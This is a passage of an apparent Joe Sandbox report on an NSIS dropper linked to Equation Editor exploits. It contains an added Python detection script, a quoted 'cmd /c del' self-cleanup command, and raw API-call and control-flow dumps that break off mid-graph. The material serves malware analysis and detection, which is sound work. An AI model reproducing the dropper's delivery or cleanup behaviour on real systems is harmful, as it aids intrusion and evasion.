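The two records above give the two pieces of the chain a detection engineer wants to spot in endpoint telemetry: EQNEDT32.EXE started with -Embedding (Office handing an OLE object from the document to the Equation Editor, the delivery path behind the CVE-2017-11882 / CVE-2018-0802 signatures in the report header) and cmd.exe /c del removing a dropped executable from %TEMP%. The following is an added Python example, not part of the Joe Sandbox report: it parses process records in the report's own Key:Value layout and flags both patterns. The record text is constructed from the fields shown above (trimmed to the ones the checks need); the parse_targets, analyse and triage function names and the wording of the findings are this example's own.

```python
"""Triage of Joe Sandbox process records (added example, not part of the report)."""
import re
from typing import Dict, List

# Constructed input: the two process records above, trimmed to the fields the
# checks need. Paths and command lines are copied from the report verbatim.
SAMPLE_REPORT = r"""
Target ID:10
Start time:13:26:03
Start date:21/11/2023
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
Has exited:true

Target ID:12
Start time:13:26:17
Start date:21/11/2023
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Has exited:false
"""

Target = Dict[str, str]

# cmd.exe /c del "<anything>\AppData\Local\Temp\<name>.exe", quotes optional.
TEMP_EXE_DELETE = re.compile(
    r'/c\s+del\s+"?(?P<target>[^"]*\\AppData\\Local\\Temp\\[^"\\]+\.exe)"?',
    re.IGNORECASE,
)


def parse_targets(text: str) -> List[Target]:
    """Split the report's 'Key:Value' lines into one dict per process record.

    Records are separated by blank lines. Only the first ':' separates key from
    value, so 'Path:C:\\Windows\\...' keeps its drive letter and 'Start
    time:13:26:03' keeps the full timestamp."""
    targets: List[Target] = []
    current: Target = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                targets.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        targets.append(current)
    return targets


def image_name(target: Target) -> str:
    """Basename of the Path field, lower-cased for comparison."""
    return target.get("Path", "").rsplit("\\", 1)[-1].lower()


def analyse(target: Target) -> List[str]:
    """Return human-readable findings for one process record."""
    findings: List[str] = []
    exe = image_name(target)
    cmdline = target.get("Commandline", "")
    if exe == "eqnedt32.exe" and "-embedding" in cmdline.lower():
        # Equation Editor is only ever started by Office via COM; a document
        # carrying an Equation OLE object is how the CVE-2017-11882 /
        # CVE-2018-0802 lures reach it, so every instance deserves a look.
        findings.append("Equation Editor started via COM (-Embedding): "
                        "check for child processes, dropped PEs and network use")
    if exe == "cmd.exe":
        m = TEMP_EXE_DELETE.search(cmdline)
        if m:
            # Droppers commonly delete themselves this way once the payload
            # is injected elsewhere; the deleted path is the artefact to pull
            # from the image or from file-creation telemetry.
            findings.append("self-cleanup: dropped executable deleted from %TEMP%: "
                            + m.group("target"))
    return findings


def triage(text: str) -> Dict[str, List[str]]:
    """Map Target ID -> findings for every record in the report text."""
    return {t.get("Target ID", "?"): analyse(t) for t in parse_targets(text)}


if __name__ == "__main__":
    for tid, hits in triage(SAMPLE_REPORT).items():
        for hit in hits:
            print(f"Target {tid}: {hit}")
```

The same two checks translate directly to a process-creation rule (Sysmon event 1 or equivalent): parent or image ending in EQNEDT32.EXE, and cmd.exe whose command line matches the /c del pattern against %TEMP%. Note that the cmd.exe record starts at 13:26:03 and the second EQNEDT32.EXE instance at 13:26:17, so the dropped file was already gone before that instance ran; any file-based hunt has to rely on the creation event, not on the file still being present.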


                                          Execution Graph

                                          Execution Coverage:15.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:22.7%
                                          Total number of Nodes:1291
                                          Total number of Limit Nodes:23
                                          execution_graph: [call-graph node list omitted; the 1291 nodes were rendered as "node address [API names] caller->callee" pairs and are not readable as text]
                                          API chains visible in the graph: lstrcpynA/lstrcatA/wsprintfA string building; GetTempPathA/GetTempFileNameA with GetFileAttributesA/CreateFileA/SetFilePointer/ReadFile/WriteFile extraction loops; SHGetSpecialFolderLocation/SHGetPathFromIDListA, GetSystemDirectoryA/GetWindowsDirectoryA and RegOpenKeyExA/RegQueryValueExA/RegEnumKeyA/RegDeleteValueA/RegDeleteKeyA lookups; FindFirstFileA/FindNextFileA/DeleteFileA/RemoveDirectoryA cleanup; LoadLibraryExA/GetProcAddress/FreeLibrary plugin calls; ShellExecuteA, MoveFileA, CopyFileA and ExitWindowsEx; dialog and control handling (DialogBoxParamA, CreateWindowExA, SendMessageA, SHBrowseForFolderA). This is the stock runtime of an NSIS installer stub, consistent with the NSISDropper detection in the report header.
4211 404333 4213 405f28 5 API calls 4211->4213 4212 40446b 4214 405f28 5 API calls 4212->4214 4213->4188 4222 404472 4214->4222 4216 4043f2 lstrcmpiA 4215->4216 4216->4210 4219 404403 lstrcatA 4216->4219 4217 4044ae 4244 405b98 lstrcpynA 4217->4244 4219->4210 4220 4044b5 4221 40571f 4 API calls 4220->4221 4223 4044bb GetDiskFreeSpaceA 4221->4223 4222->4217 4225 4056d2 2 API calls 4222->4225 4227 404506 4222->4227 4226 4044df MulDiv 4223->4226 4223->4227 4225->4222 4226->4227 4228 404577 4227->4228 4229 40470e 21 API calls 4227->4229 4230 40459a 4228->4230 4231 40140b 2 API calls 4228->4231 4232 404564 4229->4232 4245 403e76 EnableWindow 4230->4245 4231->4230 4234 404579 SetDlgItemTextA 4232->4234 4235 404569 4232->4235 4234->4228 4237 404649 21 API calls 4235->4237 4236 4045b6 4236->4238 4246 404227 4236->4246 4237->4228 4238->4194 4240->4184 4241->4211 4242->4191 4243->4212 4244->4220 4245->4236 4247 404235 4246->4247 4248 40423a SendMessageA 4246->4248 4247->4248 4248->4238 4249 401595 4250 402a29 18 API calls 4249->4250 4251 40159c SetFileAttributesA 4250->4251 4252 4015ae 4251->4252 4253 401717 4254 402a29 18 API calls 4253->4254 4255 40171e SearchPathA 4254->4255 4256 401739 4255->4256 4257 402899 SendMessageA 4258 4028b3 InvalidateRect 4257->4258 4259 4028be 4257->4259 4258->4259 4260 40229a 4261 402a29 18 API calls 4260->4261 4262 4022a8 4261->4262 4263 402a29 18 API calls 4262->4263 4264 4022b1 4263->4264 4265 402a29 18 API calls 4264->4265 4266 4022bb GetPrivateProfileStringA 4265->4266 4267 403f9c 4268 403fb2 4267->4268 4273 4040bf 4267->4273 4271 403e54 19 API calls 4268->4271 4269 40412e 4270 404202 4269->4270 4272 404138 GetDlgItem 4269->4272 4278 403ebb 8 API calls 4270->4278 4274 404008 4271->4274 4275 4041c0 4272->4275 4276 40414e 4272->4276 4273->4269 4273->4270 4277 404103 GetDlgItem SendMessageA 4273->4277 4279 403e54 19 API calls 4274->4279 4275->4270 4281 4041d2 4275->4281 4276->4275 4280 404174 6 API calls 4276->4280 4298 403e76 EnableWindow 
4277->4298 4283 4041fd 4278->4283 4284 404015 CheckDlgButton 4279->4284 4280->4275 4285 4041d8 SendMessageA 4281->4285 4286 4041e9 4281->4286 4296 403e76 EnableWindow 4284->4296 4285->4286 4286->4283 4289 4041ef SendMessageA 4286->4289 4287 404129 4290 404227 SendMessageA 4287->4290 4289->4283 4290->4269 4291 404033 GetDlgItem 4297 403e89 SendMessageA 4291->4297 4293 404049 SendMessageA 4294 404070 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4293->4294 4295 404067 GetSysColor 4293->4295 4294->4283 4295->4294 4296->4291 4297->4293 4298->4287 4299 40149d 4300 402241 4299->4300 4301 4014ab PostQuitMessage 4299->4301 4301->4300 4309 401b23 4310 401b30 4309->4310 4311 401b74 4309->4311 4312 40222e 4310->4312 4319 401b47 4310->4319 4313 401b78 4311->4313 4314 401b9d GlobalAlloc 4311->4314 4316 405bba 18 API calls 4312->4316 4324 401bb8 4313->4324 4330 405b98 lstrcpynA 4313->4330 4315 405bba 18 API calls 4314->4315 4315->4324 4318 40223b 4316->4318 4322 405459 MessageBoxIndirectA 4318->4322 4328 405b98 lstrcpynA 4319->4328 4320 401b8a GlobalFree 4320->4324 4322->4324 4323 401b56 4329 405b98 lstrcpynA 4323->4329 4326 401b65 4331 405b98 lstrcpynA 4326->4331 4328->4323 4329->4326 4330->4320 4331->4324 4332 4021a5 4333 402a29 18 API calls 4332->4333 4334 4021ab 4333->4334 4335 402a29 18 API calls 4334->4335 4336 4021b4 4335->4336 4337 402a29 18 API calls 4336->4337 4338 4021bd 4337->4338 4339 405e93 2 API calls 4338->4339 4340 4021c6 4339->4340 4341 4021d7 lstrlenA lstrlenA 4340->4341 4342 4021ca 4340->4342 4344 404e84 25 API calls 4341->4344 4343 404e84 25 API calls 4342->4343 4346 4021d2 4342->4346 4343->4346 4345 402213 SHFileOperationA 4344->4345 4345->4342 4345->4346 4347 402227 4348 40222e 4347->4348 4352 402241 4347->4352 4349 405bba 18 API calls 4348->4349 4350 40223b 4349->4350 4351 405459 MessageBoxIndirectA 4350->4351 4351->4352 4353 401ca7 4354 402a0c 18 API calls 4353->4354 4355 401cae 4354->4355 4356 402a0c 18 API calls 4355->4356 4357 401cb6 
GetDlgItem 4356->4357 4358 4024eb 4357->4358 4358->4358 4359 4035a9 4360 4035b4 4359->4360 4361 4035b8 4360->4361 4362 4035bb GlobalAlloc 4360->4362 4362->4361 4363 40262e 4364 402635 4363->4364 4365 4028be 4363->4365 4366 40263b FindClose 4364->4366 4366->4365 4367 4026af 4368 402a29 18 API calls 4367->4368 4370 4026bd 4368->4370 4369 4026d3 4372 405850 2 API calls 4369->4372 4370->4369 4371 402a29 18 API calls 4370->4371 4371->4369 4373 4026d9 4372->4373 4393 40586f GetFileAttributesA CreateFileA 4373->4393 4375 4026e6 4376 4026f2 GlobalAlloc 4375->4376 4377 40278f 4375->4377 4378 402786 CloseHandle 4376->4378 4379 40270b 4376->4379 4380 402797 DeleteFileA 4377->4380 4381 4027aa 4377->4381 4378->4377 4394 4030b3 SetFilePointer 4379->4394 4380->4381 4383 402711 4384 403081 ReadFile 4383->4384 4385 40271a GlobalAlloc 4384->4385 4386 40272a 4385->4386 4387 40275e WriteFile GlobalFree 4385->4387 4389 402e8e 37 API calls 4386->4389 4388 402e8e 37 API calls 4387->4388 4390 402783 4388->4390 4392 402737 4389->4392 4390->4378 4391 402755 GlobalFree 4391->4387 4392->4391 4393->4375 4394->4383 4395 4027b0 4396 402a0c 18 API calls 4395->4396 4397 4027b6 4396->4397 4398 4027f1 4397->4398 4399 4027da 4397->4399 4400 40268f 4397->4400 4401 402807 4398->4401 4402 4027fb 4398->4402 4403 4027df 4399->4403 4408 4027ee 4399->4408 4405 405bba 18 API calls 4401->4405 4404 402a0c 18 API calls 4402->4404 4409 405b98 lstrcpynA 4403->4409 4404->4408 4405->4408 4408->4400 4410 405af6 wsprintfA 4408->4410 4409->4400 4410->4400 4411 401eb2 4412 402a29 18 API calls 4411->4412 4413 401eb9 4412->4413 4414 405e93 2 API calls 4413->4414 4415 401ebf 4414->4415 4417 401ed1 4415->4417 4418 405af6 wsprintfA 4415->4418 4418->4417 3356 4015b3 3357 402a29 18 API calls 3356->3357 3358 4015ba 3357->3358 3359 40571f 4 API calls 3358->3359 3374 4015c2 3359->3374 3360 40161c 3362 401621 3360->3362 3363 40164a 3360->3363 3361 4056b6 CharNextA 3361->3374 3383 401423 3362->3383 3366 401423 25 API calls 
3363->3366 3369 401642 3366->3369 3371 401633 SetCurrentDirectoryA 3371->3369 3372 401604 GetFileAttributesA 3372->3374 3374->3360 3374->3361 3374->3372 3375 4053e0 3374->3375 3378 405346 CreateDirectoryA 3374->3378 3387 4053c3 CreateDirectoryA 3374->3387 3376 405f28 5 API calls 3375->3376 3377 4053e7 3376->3377 3377->3374 3379 405397 GetLastError 3378->3379 3381 405393 3378->3381 3380 4053a6 SetFileSecurityA 3379->3380 3379->3381 3380->3381 3382 4053bc GetLastError 3380->3382 3381->3374 3382->3381 3384 404e84 25 API calls 3383->3384 3385 401431 3384->3385 3386 405b98 lstrcpynA 3385->3386 3386->3371 3388 4053d3 3387->3388 3389 4053d7 GetLastError 3387->3389 3388->3374 3389->3388 4419 4016b3 4420 402a29 18 API calls 4419->4420 4421 4016b9 GetFullPathNameA 4420->4421 4424 4016d0 4421->4424 4428 4016f1 4421->4428 4422 401705 GetShortPathNameA 4423 4028be 4422->4423 4425 405e93 2 API calls 4424->4425 4424->4428 4426 4016e1 4425->4426 4426->4428 4429 405b98 lstrcpynA 4426->4429 4428->4422 4428->4423 4429->4428 4430 402336 4431 40233c 4430->4431 4432 402a29 18 API calls 4431->4432 4433 40234e 4432->4433 4434 402a29 18 API calls 4433->4434 4435 402358 RegCreateKeyExA 4434->4435 4436 402382 4435->4436 4439 4028be 4435->4439 4437 402a29 18 API calls 4436->4437 4438 40239a 4436->4438 4440 402393 lstrlenA 4437->4440 4441 402a0c 18 API calls 4438->4441 4443 4023a6 4438->4443 4440->4438 4441->4443 4442 4023c1 RegSetValueExA 4445 4023d7 RegCloseKey 4442->4445 4443->4442 4444 402e8e 37 API calls 4443->4444 4444->4442 4445->4439 4447 402836 4448 402a0c 18 API calls 4447->4448 4449 40283c 4448->4449 4450 40284a 4449->4450 4451 40286d 4449->4451 4453 40268f 4449->4453 4450->4453 4455 405af6 wsprintfA 4450->4455 4452 405bba 18 API calls 4451->4452 4451->4453 4452->4453 4455->4453 4456 4014b7 4457 4014bd 4456->4457 4458 401389 2 API calls 4457->4458 4459 4014c5 4458->4459 3390 401e38 3391 402a29 18 API calls 3390->3391 3392 401e3e 3391->3392 3393 404e84 25 API calls 3392->3393 3394 
401e48 3393->3394 3406 4053f8 CreateProcessA 3394->3406 3396 401ea4 CloseHandle 3400 40268f 3396->3400 3397 401e6d WaitForSingleObject 3398 401e4e 3397->3398 3399 401e7b GetExitCodeProcess 3397->3399 3398->3396 3398->3397 3398->3400 3409 405f64 3398->3409 3402 401e98 3399->3402 3403 401e8d 3399->3403 3402->3396 3405 401e96 3402->3405 3413 405af6 wsprintfA 3403->3413 3405->3396 3407 405433 3406->3407 3408 405427 CloseHandle 3406->3408 3407->3398 3408->3407 3410 405f81 PeekMessageA 3409->3410 3411 405f91 3410->3411 3412 405f77 DispatchMessageA 3410->3412 3411->3397 3412->3410 3413->3405 4460 401d38 GetDC GetDeviceCaps 4461 402a0c 18 API calls 4460->4461 4462 401d54 MulDiv 4461->4462 4463 402a0c 18 API calls 4462->4463 4464 401d69 4463->4464 4465 405bba 18 API calls 4464->4465 4466 401da2 CreateFontIndirectA 4465->4466 4467 4024eb 4466->4467 4475 402539 4476 402a0c 18 API calls 4475->4476 4479 402543 4476->4479 4477 4025b9 4478 402577 ReadFile 4478->4477 4478->4479 4479->4477 4479->4478 4480 4025bb 4479->4480 4481 4025cb 4479->4481 4484 405af6 wsprintfA 4480->4484 4481->4477 4483 4025e1 SetFilePointer 4481->4483 4483->4477 4484->4477 3650 40173e 3651 402a29 18 API calls 3650->3651 3652 401745 3651->3652 3653 40589e 2 API calls 3652->3653 3654 40174c 3653->3654 3655 40589e 2 API calls 3654->3655 3655->3654 4485 40193f 4486 402a29 18 API calls 4485->4486 4487 401946 lstrlenA 4486->4487 4488 4024eb 4487->4488

                                          Control-flow Graph

                                          APIs
                                          • SetErrorMode.KERNELBASE ref: 00403121
                                          • GetVersion.KERNEL32 ref: 00403127
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                          • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                          • OleInitialize.OLE32(00000000), ref: 00403178
                                          • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                          • GetCommandLineA.KERNEL32(nrdosueajqjitn Setup,NSIS Error), ref: 004031A9
                                          • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 004031BC
                                          • CharNextA.USER32(00000000), ref: 004031E7
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                          • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                          • ExitProcess.KERNELBASE(00000020), ref: 00403332
                                          • OleUninitialize.OLE32 ref: 00403337
                                          • ExitProcess.KERNEL32 ref: 00403357
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 0040336A
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403379
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403384
                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403390
                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                          • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                          • CopyFileA.KERNEL32 ref: 0040340A
                                          • CloseHandle.KERNEL32(00000000), ref: 00403437
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                          • ExitProcess.KERNEL32 ref: 0040350B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                          • String ID: $ /D=$ _?=$"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$nrdosueajqjitn Setup$~nsu
                                          • API String ID: 1031542678-394764541
                                          • Opcode ID: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                          • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                          • Opcode Fuzzy Hash: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                          • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                          • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                          • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040560F
                                          • FindClose.KERNELBASE(?), ref: 00405620
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*$C:\Users\user\AppData\Roaming\word.exe$\*.*
                                          • API String ID: 2035342205-3551532976
                                          • Opcode ID: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                          • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                          • Opcode Fuzzy Hash: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                          • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                          • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                          • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                          • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 738 405e93-405ea7 FindFirstFileA 739 405eb4 738->739 740 405ea9-405eb2 FindClose 738->740 741 405eb6-405eb7 739->741 740->741
                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,00422588,C:\,004057AF,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                          • FindClose.KERNEL32(00000000), ref: 00405EAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: C:\
                                          • API String ID: 2295610775-3404278061
                                          • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                          • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                          • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                          • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 132 403981-403993 133 403ad4-403ae3 132->133 134 403999-40399f 132->134 135 403b32-403b47 133->135 136 403ae5-403b2d GetDlgItem * 2 call 403e54 SetClassLongA call 40140b 133->136 134->133 137 4039a5-4039ae 134->137 139 403b87-403b8c call 403ea0 135->139 140 403b49-403b4c 135->140 136->135 141 4039b0-4039bd SetWindowPos 137->141 142 4039c3-4039c6 137->142 154 403b91-403bac 139->154 146 403b4e-403b59 call 401389 140->146 147 403b7f-403b81 140->147 141->142 143 4039e0-4039e6 142->143 144 4039c8-4039da ShowWindow 142->144 149 403a02-403a05 143->149 150 4039e8-4039fd DestroyWindow 143->150 144->143 146->147 168 403b5b-403b7a SendMessageA 146->168 147->139 153 403e21 147->153 158 403a07-403a13 SetWindowLongA 149->158 159 403a18-403a1e 149->159 156 403dfe-403e04 150->156 155 403e23-403e2a 153->155 161 403bb5-403bbb 154->161 162 403bae-403bb0 call 40140b 154->162 156->153 169 403e06-403e0c 156->169 158->155 166 403ac1-403acf call 403ebb 159->166 167 403a24-403a35 GetDlgItem 159->167 164 403bc1-403bcc 161->164 165 403ddf-403df8 DestroyWindow EndDialog 161->165 162->161 164->165 171 403bd2-403c1f call 405bba call 403e54 * 3 GetDlgItem 164->171 165->156 166->155 172 403a54-403a57 167->172 173 403a37-403a4e SendMessageA IsWindowEnabled 167->173 168->155 169->153 170 403e0e-403e17 ShowWindow 169->170 170->153 202 403c21-403c26 171->202 203 403c29-403c65 ShowWindow EnableWindow call 403e76 EnableWindow 171->203 176 403a59-403a5a 172->176 177 403a5c-403a5f 172->177 173->153 173->172 180 403a8a-403a8f call 403e2d 176->180 181 403a61-403a67 177->181 182 403a6d-403a72 177->182 180->166 185 403aa8-403abb SendMessageA 181->185 186 403a69-403a6b 181->186 182->185 187 403a74-403a7a 182->187 185->166 186->180 188 403a91-403a9a call 40140b 187->188 189 403a7c-403a82 call 40140b 187->189 188->166 199 403a9c-403aa6 188->199 198 403a88 189->198 198->180 199->198 202->203 206 403c67-403c68 203->206 207 403c6a 203->207 208 403c6c-403c9a GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403c9c-403cad SendMessageA 208->209 210 403caf 208->210 211 403cb5-403cee call 403e89 call 405b98 lstrlenA call 405bba SetWindowTextA call 401389 209->211 210->211 211->154 220 403cf4-403cf6 211->220 220->154 221 403cfc-403d00 220->221 222 403d02-403d08 221->222 223 403d1f-403d33 DestroyWindow 221->223 222->153 224 403d0e-403d14 222->224 223->156 225 